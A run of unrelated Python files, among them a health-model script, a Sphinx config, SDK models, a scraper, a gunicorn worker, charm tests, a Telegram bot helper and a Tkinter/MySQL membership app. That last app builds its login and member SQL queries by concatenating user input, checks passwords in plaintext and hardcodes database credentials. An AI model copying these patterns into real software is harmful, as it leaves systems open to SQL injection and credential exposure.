for subnational in df_subnational.ihme_loc_id.unique()
]
# link all models together
link_cascade_models(global_model,
[super_region_models, region_models, national_models, subnational_models],
location_structure)
# fit model
global_model.run_models()
# create plots
model_list = global_model.to_list()
# predict
pred_dfs = {}
for cmodel in model_list:
pred_dfs[cmodel.name] = predict(cmodel.df, cmodel.model)
# plot
for loc_id in df_all.ihme_loc_id.unique():
df_sub = df_all[df_all.ihme_loc_id == loc_id]
loc_structure = [
"Global",
df_sub.super_region_name.values[0],
df_sub.region_name.values[0]
]
if len(loc_id) > 3:
loc_structure.extend([loc_id[:3], loc_id])
else:
loc_structure.append(loc_id)
plot_model(df_all, pred_dfs, loc_structure)
plt.savefig(results_path / f"{loc_id}.pdf", bbox_inches="tight")
plt.close("all")
# # create results dataframe
# coefs = pd.concat([model.model.get_coefs_df() for model in model_list])
# coefs["location"] = [model.name for model in model_list]
# coefs.to_csv(results_path / "coefs.csv", index=False)
# # create samples of the coefficient
# for cmodel in model_list:
# df_coefs = sample_coefs(cmodel)
# df_coefs.to_csv(results_path / f"cdraws_{cmodel.level_id}_{cmodel.name}.csv", index=False)
return model_list
if __name__ == "__main__":
models = main()
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
#import xdem.version
# Allow conf.py to find the xdem module
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../../"))
# -- Project information -----------------------------------------------------
project = 'xdem'
copyright = '2021, xdem contributors'
author = 'xdem contributors'
# The full version, including alpha/beta/rc tags
release = "0.0.1"
os.environ["PYTHON"] = sys.executable
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc", # Create the API documentation automatically
"sphinx.ext.viewcode", # Create the "[source]" button in the API to show the source code.
'matplotlib.sphinxext.plot_directive', # Render matplotlib figures from code.
"sphinx.ext.autosummary", # Create API doc summary texts from the docstrings.
"sphinx.ext.inheritance_diagram", # For class inheritance diagrams (see coregistration.rst).
"sphinx_autodoc_typehints", # Include type hints in the API documentation.
"sphinxcontrib.programoutput"
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
"api/modules.rst" # This is not really needed, but is created automatically by autodoc
]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static'] # Commented out as we have no custom static data
def run_apidoc(_):
"""
Make sure readthedocs finds the module.
Maybe this is not needed?
"""
from sphinx.ext.apidoc import main
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
cur_dir = os.path.abspath(os.path.dirname(__file__))
module = os.path.join(cur_dir, "../../", "xdem")
output_path = os.path.join(cur_dir, 'api/')
main(['-e', '-o', output_path, module, os.path.join(module, "version.py"), "--force"])
def setup(app):
app.connect('builder-inited', run_apidoc)
|
from infrastructure.db.question_solution_schema import QuestionSolution
import logging
logger = logging.getLogger(__name__)
class QuestionSolutionRepositoryPostgres:
def add_question_solution(self, db, question_solution):
db.add(question_solution)
db.commit()
logger.info("Added new question solution")
logger.debug("ID of the new question solution: %s", question_solution.id)
def get_question_solution(self, db, question_solution_id):
question_solution = db.query(QuestionSolution).filter(QuestionSolution.id == question_solution_id).first()
logger.debug("Getting question solution %s", question_solution_id)
return question_solution
def get_all_question_solutions_by_question_template_id(self, db, question_template_id):
query = db.query(QuestionSolution).filter(QuestionSolution.question_template_id == question_template_id)
question_solutions = query.all()
logger.debug("Getting all question solutions of question template %s", question_template_id)
return question_solutions
def get_all_question_solutions_by_exam_solution_id(self, db, exam_solution_id):
query = db.query(QuestionSolution).filter(QuestionSolution.exam_solution_id == exam_solution_id)
question_solutions = query.all()
logger.debug("Getting all question solutions of exam solution %s", exam_solution_id)
return question_solutions
def delete_question_solution(self, db, question_solution):
db.delete(question_solution)
db.commit()
logger.debug("Delete question solution %s", question_solution.id)
logger.info("Question solution deleted")
def update_question_solution(self, db):
db.commit()
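# Usage sketch (assumes `db` is a SQLAlchemy session, as the add/commit
# calls above imply; arguments here are illustrative):
#
#   repo = QuestionSolutionRepositoryPostgres()
#   repo.add_question_solution(db, QuestionSolution(...))
#   solutions = repo.get_all_question_solutions_by_exam_solution_id(db, exam_solution_id)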
|
# File: recordedfuture_consts.py
#
# Copyright (c) Recorded Future, Inc, 2019-2022
#
# This unpublished material is proprietary to Recorded Future. All
# rights reserved. The methods and techniques described herein are
# considered trade secrets and/or confidential. Reproduction or
# distribution, in whole or in part, is forbidden except by express
# written permission of Recorded Future.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
# Define your constants here
version = '3.1.0'
buildid = '264'
# timeout for our http requests to bfi_phantom
timeout = 33
# These dicts map which path_info template and fields to use, what the
# Recorded Future category is called, and whether to URL-quote the entity.
# They are used to make the reputation/intelligence methods parameterized.
# (path_info template, fields, category name, quote flag)
INTELLIGENCE_MAP = {
'ip': (
'/ip/%s',
[
'entity',
'risk',
'timestamps',
"threatLists",
"intelCard",
"metrics",
"location",
"relatedEntities",
],
'ip',
False,
),
'domain': (
'/domain/idn:%s',
[
'entity',
'risk',
'timestamps',
"threatLists",
"intelCard",
"metrics",
"relatedEntities",
],
'domain',
False,
),
'file': (
'/hash/%s',
[
'entity',
'risk',
'timestamps',
"threatLists",
"intelCard",
"metrics",
"hashAlgorithm",
"relatedEntities",
],
'hash',
False,
),
'vulnerability': (
'/vulnerability/%s',
[
'entity',
'risk',
'timestamps',
"threatLists",
"intelCard",
"metrics",
"cvss",
"nvdDescription",
"relatedEntities",
],
'vulnerability',
False,
),
'url': (
'/url/%s',
['entity', 'risk', 'timestamps', "metrics", "relatedEntities"],
'url',
True,
),
}
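# Sketch of how INTELLIGENCE_MAP might be consumed (illustrative only; the
# helper and its arguments are assumptions, not part of this module):
#
#   from urllib.parse import quote
#
#   def build_intel_path(entity_type, entity):
#       path_template, fields, _category, quote_entity = INTELLIGENCE_MAP[entity_type]
#       value = quote(entity, safe='') if quote_entity else entity
#       return path_template % value, fields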
|
# -*- coding: utf-8 -*-
# Copyright 2021 Cohesity Inc.
import cohesity_management_sdk.models.recover_virtual_disk_info_proto
import cohesity_management_sdk.models.recover_virtual_disk_params
class RecoverDisksTaskStateProto(object):
"""Implementation of the 'RecoverDisksTaskStateProto' model.
TODO: type model description here.
Attributes:
recover_virtual_disk_info (RecoverVirtualDiskInfoProto): Each
available extension is listed below along with the location of the
proto file (relative to magneto/connectors) where it is defined.
RecoverVirtualDiskInfoProto extension Location
===================================================================
==========
===================================================================
==========
recover_virtual_disk_params (RecoverVirtualDiskParams): TODO: type
description here.
"""
# Create a mapping from Model property names to API property names
_names = {
"recover_virtual_disk_info":'recoverVirtualDiskInfo',
"recover_virtual_disk_params":'recoverVirtualDiskParams'
}
def __init__(self,
recover_virtual_disk_info=None,
recover_virtual_disk_params=None):
"""Constructor for the RecoverDisksTaskStateProto class"""
# Initialize members of the class
self.recover_virtual_disk_info = recover_virtual_disk_info
self.recover_virtual_disk_params = recover_virtual_disk_params
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
recover_virtual_disk_info = cohesity_management_sdk.models.recover_virtual_disk_info_proto.RecoverVirtualDiskInfoProto.from_dictionary(dictionary.get('recoverVirtualDiskInfo')) if dictionary.get('recoverVirtualDiskInfo') else None
recover_virtual_disk_params = cohesity_management_sdk.models.recover_virtual_disk_params.RecoverVirtualDiskParams.from_dictionary(dictionary.get('recoverVirtualDiskParams')) if dictionary.get('recoverVirtualDiskParams') else None
# Return an object of this model
return cls(recover_virtual_disk_info,
recover_virtual_disk_params)
|
import re
from .site import main, Site
class Amazon(Site):
"""amazon.com"""
BASE_URL = 'https://www.amazon.com'
NAMES = {
'en': 'Amazon',
'ja-jp': 'Amazon',
'zh-cn': '亚马逊',
}
MIN_RATING = 1
MAX_RATING = 5
SEARCH_LOCALES = ['en-jp', 'en']
def info_url(self, id):
return f'{self.BASE_URL}/dp/{id}'
def _get_rating(self, id):
soup = self._get_soup(self.info_url(id))
rating_str = soup.find(class_="arp-rating-out-of-text").get_text()
rating = float(rating_str.strip().split()[0])
count = int(soup.find(class_="totalReviewCount").get_text())
return rating, count
def _search(self, name):
# Amazon has lots of stuff, so we only match whole words here.
params = {
'field-keywords': '"' + name + '"',
'rh': 'n:2858778011,n:2864549011',
}
soup = self._get_soup(self.BASE_URL + '/s', params=params)
# Handle no results cases.
if soup.find(id='apsRedirectLink') or soup.find(id='noResultsTitle'):
raise RuntimeError('No results found')
regex = re.compile(r'/dp/(\w+)')
href = soup.find('a', href=regex)['href']
id = regex.search(href).group(1)
return id
if __name__ == '__main__':
main(Amazon(), {'en': 'Dropkick on My Devil!'})
|
# -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
from __future__ import with_statement
import os
import sys
# workaround on osx, disable kqueue
if sys.platform == "darwin":
os.environ['EVENT_NOKQUEUE'] = "1"
import gevent
from gevent.pool import Pool
from gevent.server import StreamServer
from gevent import pywsgi, wsgi
import gunicorn
from gunicorn.workers.async import AsyncWorker
from gunicorn.workers.base import Worker
VERSION = "gevent/%s gunicorn/%s" % (gevent.__version__, gunicorn.__version__)
BASE_WSGI_ENV = {
'GATEWAY_INTERFACE': 'CGI/1.1',
'SERVER_SOFTWARE': VERSION,
'SCRIPT_NAME': '',
'wsgi.version': (1, 0),
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False
}
class GGeventServer(StreamServer):
def __init__(self, listener, handle, spawn='default', worker=None):
StreamServer.__init__(self, listener, spawn=spawn)
self.handle_func = handle
self.worker = worker
def stop(self, timeout=None):
super(GGeventServer, self).stop(timeout=timeout)
def handle(self, sock, addr):
self.handle_func(sock, addr)
class GeventWorker(AsyncWorker):
def __init__(self, *args, **kwargs):
super(GeventWorker, self).__init__(*args, **kwargs)
@classmethod
def setup(cls):
from gevent import monkey
monkey.noisy = False
monkey.patch_all()
def timeout_ctx(self):
return gevent.Timeout(self.cfg.keepalive, False)
def run(self):
self.socket.setblocking(1)
pool = Pool(self.worker_connections)
server = GGeventServer(self.socket, self.handle, spawn=pool,
worker=self)
server.start()
try:
while self.alive:
self.notify()
if self.ppid != os.getppid():
self.log.info("Parent changed, shutting down: %s" % self)
break
gevent.sleep(0.1)
except KeyboardInterrupt:
pass
try:
# Try to stop connections until timeout
self.notify()
server.stop(timeout=self.timeout)
except Exception:
pass
def handle_request(self, *args):
try:
super(GeventWorker, self).handle_request(*args)
except gevent.GreenletExit:
pass
def init_process(self):
#gevent doesn't reinitialize dns for us after forking
#here's the workaround
gevent.core.dns_shutdown(fail_requests=1)
gevent.core.dns_init()
super(GeventWorker, self).init_process()
class GeventBaseWorker(Worker):
"""\
This base class is used for the two variants of workers that use
Gevent's two different WSGI workers. ``gevent_wsgi`` worker uses
the libevent HTTP parser but does not support streaming response
bodies or Keep-Alive. The ``gevent_pywsgi`` worker uses an
alternative Gevent WSGI server that supports streaming and Keep-
Alive but does not use the libevent HTTP parser.
"""
server_class = None
wsgi_handler = None
def __init__(self, *args, **kwargs):
super(GeventBaseWorker, self).__init__(*args, **kwargs)
self.worker_connections = self.cfg.worker_connections
@classmethod
def setup(cls):
from gevent import monkey
monkey.patch_all()
def run(self):
self.socket.setblocking(1)
pool = Pool(self.worker_connections)
self.server_class.base_env['wsgi.multiprocess'] = (self.cfg.workers > 1)
server = self.server_class(self.socket, application=self.wsgi,
spawn=pool, handler_class=self.wsgi_handler)
server.start()
try:
while self.alive:
self.notify()
if self.ppid != os.getppid():
self.log.info("Parent changed, shutting down: %s" % self)
break
gevent.sleep(0.1)
except KeyboardInterrupt:
pass
# try to stop the connections
try:
self.notify()
server.stop(timeout=self.timeout)
except Exception:
pass
class WSGIHandler(wsgi.WSGIHandler):
def log_request(self, *args):
pass
def prepare_env(self):
env = super(WSGIHandler, self).prepare_env()
env['RAW_URI'] = self.request.uri
return env
class WSGIServer(wsgi.WSGIServer):
base_env = BASE_WSGI_ENV
class GeventWSGIWorker(GeventBaseWorker):
"The libevent HTTP based workers"
server_class = WSGIServer
wsgi_handler = WSGIHandler
class PyWSGIHandler(pywsgi.WSGIHandler):
def log_request(self, *args):
pass
def get_environ(self):
env = super(PyWSGIHandler, self).get_environ()
env['gunicorn.sock'] = self.socket
env['RAW_URI'] = self.path
return env
class PyWSGIServer(pywsgi.WSGIServer):
base_env = BASE_WSGI_ENV
class GeventPyWSGIWorker(GeventBaseWorker):
"The Gevent StreamServer based workers."
server_class = PyWSGIServer
wsgi_handler = PyWSGIHandler
|
# Learn more about testing at: https://juju.is/docs/sdk/testing
import unittest
from unittest.mock import Mock
from charm import MariadbCharm
from ops.model import ActiveStatus
from ops.testing import Harness
from charm import COMMAND
from unittest.mock import patch
class TestCharm(unittest.TestCase):
def setUp(self):
self.harness = Harness(MariadbCharm)
self.addCleanup(self.harness.cleanup)
self.harness.begin()
def test_config_changed(self):
self.assertEqual(list(self.harness.charm._stored.ports), [3306])
self.harness.update_config({"port": 4000})
self.assertEqual(list(self.harness.charm._stored.ports), [4000])
def test_mariadb_pebble_ready(self):
# Check the initial Pebble plan is empty
initial_plan = self.harness.get_container_pebble_plan("mariadb")
self.assertEqual(initial_plan.to_yaml(), "{}\n")
# Expected plan after Pebble ready with default config
expected_plan = {
"services": {
"mariadb": {
"override": "replace",
"summary": "mariadb",
"command": COMMAND,
"startup": "enabled",
"environment": {
"MYSQL_ROOT_PASSWORD": self.harness.charm._stored.root_password,
},
}
},
}
# Get the mariadb container from the model
container = self.harness.model.unit.get_container("mariadb")
# Emit the PebbleReadyEvent carrying the mariadb container
self.harness.charm.on.mariadb_pebble_ready.emit(container)
# Get the plan now we've run PebbleReady
updated_plan = self.harness.get_container_pebble_plan("mariadb").to_dict()
# Check we've got the plan we expected
self.assertEqual(expected_plan, updated_plan)
# Check the service was started
service = self.harness.model.unit.get_container("mariadb").get_service("mariadb")
self.assertTrue(service.is_running())
# Ensure we set an ActiveStatus with no message
self.assertEqual(self.harness.model.unit.status, ActiveStatus())
def test_restart_action(self):
# test restart action
action_event = Mock(params={"fail": ""})
self.harness.charm._on_restart_action(action_event)
self.assertTrue(action_event.set_results.called)
def test_restart_action_fail(self):
action_event = Mock(params={"fail": "fail this"})
self.harness.charm._on_restart_action(action_event)
self.assertTrue(action_event.set_results.called)
# @patch("subprocess.check_output")
# def test_restore_action(self, mock_check_output):
# # test restore action
# def mock_check_output(*a, **kw):
# return "mock"
# mock_check_output.return_value = 'mocked!'
# subprocess.check_output = mock_check_output
# action_event = Mock(params={"fail": ""})
# self.harness.charm._on_restore_action(action_event)
# self.assertTrue(action_event.set_results.called)
@patch("subprocess.check_output")
def test_list_action(self, mock_check_output):
# test list backup action
mock_check_output.return_value = '/data/db/testfile'.encode()
action_event = Mock(params={"fail": ""})
self.harness.charm._on_list_backup(action_event)
self.assertTrue(action_event.set_results.called)
@patch("subprocess.check_output")
def test_list_action_fail(self, mock_check_output):
# test list backup action
# mock_check_output.return_value = "fail this".encode()
action_event = Mock(params={"fail": "fail this"})
self.harness.charm._on_list_backup(action_event)
self.assertTrue(action_event.set_results.called)
|
import gettext
from google.cloud import datastore
from telegram import CallbackQuery, InlineKeyboardButton, InlineKeyboardMarkup, Update
from telegram.chataction import ChatAction
from telegram.ext import CallbackContext
from pdf_bot.consts import LANGUAGE, LANGUAGES, USER
from pdf_bot.store import client
def send_lang(update: Update, context: CallbackContext, query: CallbackQuery = None):
update.effective_message.reply_chat_action(ChatAction.TYPING)
lang = get_lang(update, context, query)
langs = [
InlineKeyboardButton(key, callback_data=key)
for key, value in sorted(LANGUAGES.items(), key=lambda x: x[1])
if value != lang
]
keyboard_size = 2
keyboard = [
langs[i : i + keyboard_size] for i in range(0, len(langs), keyboard_size)
]
reply_markup = InlineKeyboardMarkup(keyboard)
_ = set_lang(update, context)
update.effective_message.reply_text(
_("Select your language"), reply_markup=reply_markup
)
def get_lang(update: Update, context: CallbackContext, query: CallbackQuery = None):
if context.user_data is not None and LANGUAGE in context.user_data:
lang = context.user_data[LANGUAGE]
else:
if query is None:
sender = update.effective_message.from_user or update.effective_chat
user_id = sender.id
else:
user_id = query.from_user.id
user_key = client.key(USER, user_id)
user = client.get(key=user_key)
if user is None or LANGUAGE not in user:
lang = "en_GB"
else:
lang = user[LANGUAGE]
if lang == "en":
lang = "en_GB"
if context.user_data is None:
context.user_data = {LANGUAGE: lang}
else:
context.user_data[LANGUAGE] = lang
return lang
def store_lang(update, context, query):
lang_code = LANGUAGES[query.data]
with client.transaction():
user_key = client.key(USER, query.from_user.id)
user = client.get(key=user_key)
if user is None:
user = datastore.Entity(user_key)
user[LANGUAGE] = lang_code
client.put(user)
context.user_data[LANGUAGE] = lang_code
_ = set_lang(update, context)
query.message.edit_text(
_("Your language has been set to {language}").format(language=query.data)
)
def set_lang(update, context, query=None):
lang = get_lang(update, context, query)
t = gettext.translation("pdf_bot", localedir="locale", languages=[lang])
return t.gettext
|
# events.py
# Copyright 2008 Roger Marsh
# Licence: See LICENCE (BSD licence)
"""Results database Event panel class.
"""
import tkinter.messagebox
from ..core import resultsrecord
from ..core import ecfmaprecord
from ..core import filespec
from . import events_lite
class Events(events_lite.Events):
"""The Events panel for a Results database."""
_btn_ecfplayers = "events_players"
def __init__(self, parent=None, cnf=dict(), **kargs):
"""Extend and define the results database events panel."""
super(Events, self).__init__(parent=parent, cnf=cnf, **kargs)
def on_ecf_players(self, event=None):
"""Do processing for buttons with command set to on_ecf_players."""
self.update_players_to_ecf()
return "break"
def describe_buttons(self):
"""Define all action buttons that may appear on events page."""
self.define_button(
self._btn_dropevent,
text="Delete Event",
tooltip="Delete the selected event from the database.",
underline=2,
command=self.on_drop_event,
)
self.define_button(
self._btn_join_event_new_players,
text="Join Event New Players",
tooltip="Join new players with same same as earlier events.",
underline=0,
switchpanel=True,
command=self.on_join_event_new_players,
)
self.define_button(
self._btn_ecfplayers,
text="To ECF",
tooltip=(
"Update list of players with results for submission to ECF."
),
underline=1,
command=self.on_ecf_players,
)
self.define_button(
self._btn_exportevents,
text="Export Events",
tooltip=" ".join(
(
"Export event data in text format recognised by Import",
"Events.",
)
),
underline=1,
switchpanel=True,
command=self.on_export_events,
)
self.define_button(
self._btn_game_summary,
text="Game Summary",
tooltip="Show game summary for selected events.",
underline=2,
switchpanel=True,
command=self.on_game_summary,
)
self.define_button(
self._btn_event_summary,
text="Event Summary",
tooltip="Show event summary for selected events.",
underline=7,
switchpanel=True,
command=self.on_event_summary,
)
def show_event_panel_actions_allowed_buttons(self):
"""Specify buttons to show on events panel."""
self.hide_panel_buttons()
self.show_panel_buttons(
(
self._btn_dropevent,
self._btn_join_event_new_players,
self._btn_ecfplayers,
self._btn_exportevents,
self._btn_game_summary,
self._btn_event_summary,
)
)
def update_players_to_ecf(self):
"""Add players in event to players whose results to be sent to ECF."""
esel = self.eventgrid.selection
ebkm = self.eventgrid.bookmarks
update_events = []
for e in ebkm:
update_events.append(e)
for e in esel:
if e not in ebkm:
update_events.append(e)
if len(update_events) == 0:
tkinter.messagebox.showinfo(
parent=self.get_widget(),
message=" ".join(
(
"Cannot update lists of events and players for",
"submission to ECF when no events selected.",
)
),
title="Events",
)
return
else:
if len(update_events) == 1:
txt = "One event"
else:
txt = " ".join((str(len(update_events)), "events"))
if not tkinter.messagebox.askyesno(
parent=self.get_widget(),
message=" ".join(
(
txt,
"selected for updating lists of events and",
"players for submission to ECF.\nDo",
"you wish to continue?",
)
),
title="Events",
):
return
mapclub = ecfmaprecord.ECFmapDBrecordClub()
mapplayer = ecfmaprecord.ECFmapDBrecordPlayer()
db = self.get_appsys().get_results_database()
ccount = 0
pcount = 0
db.start_transaction()
mapclubcursor = db.database_cursor(
filespec.MAPECFCLUB_FILE_DEF, filespec.PLAYERALIASID_FIELD_DEF
)
try:
mapplayercursor = db.database_cursor(
filespec.MAPECFPLAYER_FILE_DEF, filespec.PERSONID_FIELD_DEF
)
try:
for event in update_events:
games = resultsrecord.get_games_for_event(
db,
resultsrecord.get_event_from_record_value(
db.get_primary_record(
filespec.EVENT_FILE_DEF, event[-1]
)
),
)
players = resultsrecord.get_players(
db, resultsrecord.get_aliases_for_games(db, games)
)
persons = resultsrecord.get_persons(db, players)
for p in players:
skey = db.encode_record_number(players[p].key.recno)
r = mapclubcursor.nearest(skey)
if r is not None:
if db.encode_record_selector(r[0]) == skey:
continue
mapclub.empty()
mapclub.value.playerkey = repr(players[p].key.recno)
mapclub.value.playername = players[
p
].value.identity_packed()
mapclub.key.recno = None
mapclub.put_record(db, filespec.MAPECFCLUB_FILE_DEF)
ccount += 1
# DPT database engine returns new cursor with fresh
# recordset. bsddb and sqlite3 database engines return
# mapclubcursor but do nothing else.
mapclubcursor = db.repair_cursor(
mapclubcursor,
filespec.MAPECFCLUB_FILE_DEF,
filespec.PLAYERALIASID_FIELD_DEF,
)
for p in persons:
skey = db.encode_record_number(persons[p].key.recno)
r = mapplayercursor.nearest(skey)
if r is not None:
if db.encode_record_selector(r[0]) == skey:
continue
mapplayer.empty()
mapplayer.value.playerkey = repr(persons[p].key.recno)
mapplayer.value.playername = persons[
p
].value.identity_packed()
mapplayer.key.recno = None
mapplayer.put_record(
db, filespec.MAPECFPLAYER_FILE_DEF
)
pcount += 1
# DPT database engine returns new cursor with fresh
# recordset. bsddb and sqlite3 database engines return
# mapplayercursor but do nothing else.
mapplayercursor = db.repair_cursor(
mapplayercursor,
filespec.MAPECFPLAYER_FILE_DEF,
filespec.PERSONID_FIELD_DEF,
)
finally:
mapplayercursor.close()
finally:
mapclubcursor.close()
# if ccount or pcount:
# db.commit()
db.commit()
if pcount:
pmsg = " ".join(
(
str(pcount),
"players added to list of players awaiting",
"attachment to grading codes",
)
)
self.refresh_controls(
(
(
db,
filespec.MAPECFPLAYER_FILE_DEF,
filespec.PERSONMAP_FIELD_DEF,
),
)
)
else:
pmsg = " ".join(
(
"No players needed adding to list of players awaiting",
"attachment to grading codes",
)
)
if ccount:
cmsg = " ".join(
(
str(ccount),
"players added to list of players awaiting",
"attachment to ECF clubs",
)
)
self.refresh_controls(
(
(
db,
filespec.MAPECFCLUB_FILE_DEF,
filespec.PLAYERALIASMAP_FIELD_DEF,
),
)
)
else:
cmsg = " ".join(
(
"No players needed adding to list of players awaiting",
"attachment to ECF clubs",
)
)
tkinter.messagebox.showinfo(
parent=self.get_widget(),
message="\n".join((pmsg, cmsg)),
title="Events",
)
|
import pandas as pd
import numpy as np
loc_gt = np.loadtxt('../../../../datasets/LogosInTheWild-v2/LogosClean/commonformat/ImageSets/top_only.txt', dtype=str)
np.random.seed(1)
X = loc_gt
def dist_from_arr(arr):
dist = np.array(np.unique(arr, return_counts=True)).T[:,1]
return dist/np.sum(dist)
def kl_divergence(dist1,dist2):
return np.sum(dist1*np.log(dist1/dist2))
# all_frames = np.array(list(dict.fromkeys(X[:,0]).keys())) # preserves order in extracting sets
all_frames = X
all_classes = np.array(list(map(lambda x: x.split('/')[0], X)))
set_classes = dict(zip(sorted(list(set(all_classes))), np.arange(len(set(all_classes)))))
all_classes = np.array([set_classes[all_classes[i]] for i in range(len(all_classes))])
divergence = 100
X_train, X_test = None, None
while divergence > 0.005: # forcing distribution to be very similar
perm = np.random.permutation(np.arange(len(all_classes)))
all_frames, all_classes = all_frames[perm], all_classes[perm]
train_frames, test_frames = all_frames[:int(len(all_frames)*0.8)], all_frames[int(len(all_frames)*0.8):]
X_train, X_test = train_frames, test_frames
train_classes, test_classes = all_classes[:int(len(all_classes)*0.8)], all_classes[int(len(all_classes)*0.8):]
dist1, dist2 = dist_from_arr(train_classes), dist_from_arr(test_classes)
if np.min(dist1)<1e-5 or np.min(dist2)<1e-5:
pass
elif dist1.size == dist2.size:
divergence = kl_divergence(dist1, dist2)
print(divergence)
# X_train.to_csv('../../datasets/train_.csv',index=False)
# X_test.to_csv('../../datasets/test_.csv',index=False)
np.savetxt('../../../../datasets/LogosInTheWild-v2/LogosClean/commonformat/ImageSets/top_only_train.txt', X_train, fmt='%s')
np.savetxt('../../../../datasets/LogosInTheWild-v2/LogosClean/commonformat/ImageSets/top_only_test.txt', X_test, fmt='%s') |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Support module generated by PAGE version 4.12
# In conjunction with Tcl version 8.6
# Apr 15, 2018 05:51:30 AM
import sys
try:
from Tkinter import *
except ImportError:
from tkinter import *
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
from tkinter import messagebox
import MySQLdb
#dataBase connection
db = MySQLdb.connect(host='somebody',user='else',passwd='s',db='lover')
cur = db.cursor()
def set_Tk_var():
global txtLoginSchoolID
txtLoginSchoolID = StringVar()
global txtLoginPassword
txtLoginPassword = StringVar()
global txtAddUID
txtAddUID = StringVar()
global txtAddName
txtAddName = StringVar()
global txtAddSurname
txtAddSurname = StringVar()
global txtAddSchoolID
txtAddSchoolID = StringVar()
global txtAddPhone
txtAddPhone = StringVar()
global txtLabelAddInfo
txtLabelAddInfo = StringVar()
global txtEditNum
txtEditNum = StringVar()
global txtEditUID
txtEditUID = StringVar()
global txtEditName
txtEditName = StringVar()
global txtEditSurname
txtEditSurname = StringVar()
global txtEditSchoolID
txtEditSchoolID = StringVar()
global txtEditPhone
txtEditPhone = StringVar()
global editCheck
editCheck = StringVar()
global txtLabelEditInfo
txtLabelEditInfo = StringVar()
global txtCreateEventName
txtCreateEventName = StringVar()
global txtCreateSociety
txtCreateSociety = StringVar()
global txtCreateDate
txtCreateDate = StringVar()
global txtLabelCreateInfo
txtLabelCreateInfo = StringVar()
global combobox
combobox = StringVar()
global txtAttendanceInfo
txtAttendanceInfo = StringVar()
global txtAttendUID
txtAttendUID = StringVar()
def buttonAddReturn(p1):
pushAddMemberButton()
def loginButtonReturn(p1):
pushLoginButton()
def pushLoginButton():
if(txtLoginSchoolID.get()=="" or txtLoginPassword.get()==""):
if(txtLoginSchoolID.get()==""):
messagebox.showwarning("Empty School ID","Enter a School ID")
else:
messagebox.showwarning("Empty Password","Enter a password")
if(txtLoginSchoolID.get()!=""):
command = "SELECT * FROM userList WHERE schoolID ="+txtLoginSchoolID.get()+";"
cur.execute(command)
results = cur.fetchall()
if(results!=()):
for row in results:
schoolID = row[0]
name = row[1]
surname = row[2]
password = row[3]
admin = row[4]
if (txtLoginPassword.get()==password):
if(admin==b'\x01'):
messagebox.showinfo("Admin Login","Welcome "+name+" "+surname)
w.frameLogin.pack()
w.menubar.entryconfigure("Member Operations",state="normal")
w.menubar.entryconfigure("Event Operations",state="normal")
w.menubar.entryconfig("Change Password",state="normal")
else:
messagebox.showinfo("User Login","Welcome "+name+" "+surname)
w.frameLogin.pack()
w.menubar.entryconfig("Change Password",state="normal")
else:
if(txtLoginPassword.get()!=""):
messagebox.showwarning("error!","Wrong password or schoolID")
else:
messagebox.showwarning("error!","Wrong password or schoolID")
def addUIDReturn(p1):
command = "SELECT * FROM memberList WHERE UID ="+txtAddUID.get()+";"
cur.execute(command)
results = cur.fetchall()
if(results!=()):
for row in results:
schoolID = row[0]
name = row[1]
surname = row[2]
password = row[3]
admin = row[4]
messagebox.showwarning("Member Already Registered!",name+surname+" is already on the list!")
txtAddUID.set("")
w.TEntry3.focus()
else:
w.TEntry4.focus()
def pushAddMember():
w.frameAddMember.place(relx=-0.01, rely=-0.02, relheight=1.05, relwidth=1.01)
w.TEntry3.focus()
w.menubar.entryconfigure("Member Operations",state="disabled")
w.menubar.entryconfigure("Event Operations",state="disabled")
w.menubar.entryconfig("Change Password",state="disabled")
w.menubar.entryconfig("Main Menu",state="normal")
txtAddPhone.set("")
txtAddName.set("")
txtAddSchoolID.set("")
txtAddUID.set("")
txtAddSurname.set("")
def pushAttendanceOK():
if(combobox.get()!=""):
w.frameTakeAttend.place(relx=0.3, rely=0.3, relheight=0.35, relwidth=.5)
vals = combobox.get().strip().split(" ")
global ID
ID = int(vals[2])
else:
messagebox.showerror("Choose","Choose event")
def pushChangePassword():
print('member_support.pushChangePassword')
sys.stdout.flush()
def pushCreateEvent():
w.frameCreateEvent.place(relx=-0.01, rely=-0.02, relheight=1.05, relwidth=1.01)
w.menubar.entryconfigure("Member Operations",state="disabled")
w.menubar.entryconfigure("Event Operations",state="disabled")
w.menubar.entryconfig("Change Password",state="disabled")
w.menubar.entryconfig("Main Menu",state="normal")
w.TEntry14.focus()
txtCreateEventName.set("")
txtCreateDate.set("")
txtCreateSociety.set("")
def pushButtonCreateEvent():
